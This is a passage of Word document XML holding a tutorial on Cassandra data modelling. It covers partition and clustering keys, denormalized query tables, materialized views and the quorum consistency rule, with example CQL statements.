    <w:p w14:paraId="70FF56D9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB3A418" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Clustering key: sorts rows within a partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAAD781" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Enables range queries within a partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611A3ED6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    ORDER BY on clustering key is "free" (data is already sorted that way)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E982D1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074C550F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Example table design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1667DEB8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  CREATE TABLE user_orders (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D7EA26" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    user_id    UUID,           -- partition key: all orders for one user on same node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3E7B36" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    order_date TIMESTAMP,      -- clustering key: sorts orders by date within partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0709A46E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    order_id   UUID,           -- clustering key: secondary sort for same-date orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F5D353" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    total      DECIMAL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB8D5F1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    status     TEXT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F460A1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    PRIMARY KEY ((user_id), order_date, order_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2BF7C6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ) WITH CLUSTERING ORDER BY (order_date DESC, order_id DESC);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CD475D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42378BDC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  -- This table supports efficiently:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FD3EED" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  SELECT * FROM user_orders WHERE user_id = ? LIMIT 10;  -- latest 10 orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7963F94A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  SELECT * FROM user_orders WHERE user_id = ? AND order_date &gt; ?;  -- orders since date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5F7B01" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FE9739" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  -- This table CANNOT efficiently support:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FC58F3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  SELECT * FROM user_orders WHERE status = 'pending';  -- scatter-gather across all partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ED23B1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  SELECT * FROM user_orders WHERE total &gt; 1000;  -- same problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147F06BC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The denormalization imperative:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68320E12" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6352B615" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Query requirement: "Find all pending orders, sorted by date"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772032E5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="294D7148" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">Relational approach: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFF94D3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  SELECT * FROM orders WHERE status = 'pending' ORDER BY order_date DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FD28EF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  (one table, index on status)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60184133" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8A1C58" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Cassandra approach — create a separate table for this query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566E1523" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  CREATE TABLE orders_by_status (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582DD042" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    status     TEXT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709B4712" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    order_date TIMESTAMP,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1002683D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    order_id   UUID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4765B8D0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    user_id    UUID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246FD66F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    total      DECIMAL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7182361D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    PRIMARY KEY ((status), order_date, order_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B62F5EA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ) WITH CLUSTERING ORDER BY (order_date DESC, order_id DESC);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E80E3C2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AE437A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Query: SELECT * FROM orders_by_status WHERE status = 'pending' LIMIT 100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155F4310" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029C88F2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Application must write to BOTH tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3E6502" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  INSERT INTO user_orders (user_id, order_date, order_id, ...) VALUES (...);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B5E74D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  INSERT INTO orders_by_status (status, order_date, order_id, ...) VALUES (...);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B776332" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E25300F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Use Cassandra BATCH for atomicity (within same partition: atomic; cross-partition: logged batch with performance penalty):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B18073" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  BEGIN BATCH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B997CD1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    INSERT INTO user_orders ... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A562AE0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    INSERT INTO orders_by_status ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B7C21F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  APPLY BATCH;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429EE492" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B38F8D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Cost: data duplication (disk is cheap), dual-write complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5796FE3F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Benefit: both queries are O(1) partition lookup → sub-millisecond latency at any scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A4918D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Materialized views — automated denormalization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02709FD3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B00DB6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>CREATE MATERIALIZED VIEW orders_by_status AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0AD177" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  SELECT *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4012A49D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  FROM user_orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2641E178" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  WHERE status IS NOT NULL AND order_date IS NOT NULL AND order_id IS NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4873888B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  PRIMARY KEY (status, order_date, order_id, user_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134A0F12" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B30DF76" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Cassandra automatically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF97501" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Maintains the view on every write to user_orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490A779C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Handles updates and deletes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319B8A1E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370E70B3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Trade-offs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400647A9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Consistency: base table and view are eventually consistent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF806EB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Write to user_orders → propagated to view asynchronously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052E4E20" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Brief window where view is stale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C77D28D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Performance: each write generates additional write to view table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD55C83" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Operational: MVs have historically been less stable than manual denormalization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434B0001" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4C0E4A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>Production recommendation: manual denormalization often preferred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CD0441" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  More control, better performance, more explicit about data model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B28DD26" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistency, Availability, and the CAP Trade-off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B8C2BD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30138E86" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Cassandra's consistency model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794F778E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Replication factor RF: how many nodes hold copies of each partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AA6A5C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Consistency level (CL): how many nodes must respond to satisfy read/write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBF3B4A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F526711" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Strong consistency condition: W + R &gt; RF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6748C134" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    (write quorum + read quorum overlap → always read the latest write)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D28D369" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52435615" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Example (RF=3):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4A560B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    QUORUM writes (2/3 nodes) + QUORUM reads (2/3 nodes) = 4 &gt; 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD3CBD9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    → Strong consistency (equivalent to serializable in this sense)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A401461" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475AB131" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    ONE write (1/3 nodes) + ONE read (1/3 nodes) = 2 &lt; 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4C8A7A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    → Eventual consistency (may read stale data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6956D0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70346A5D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Practical consistency levels:</w:t>
      </w:r>
    </w:p>
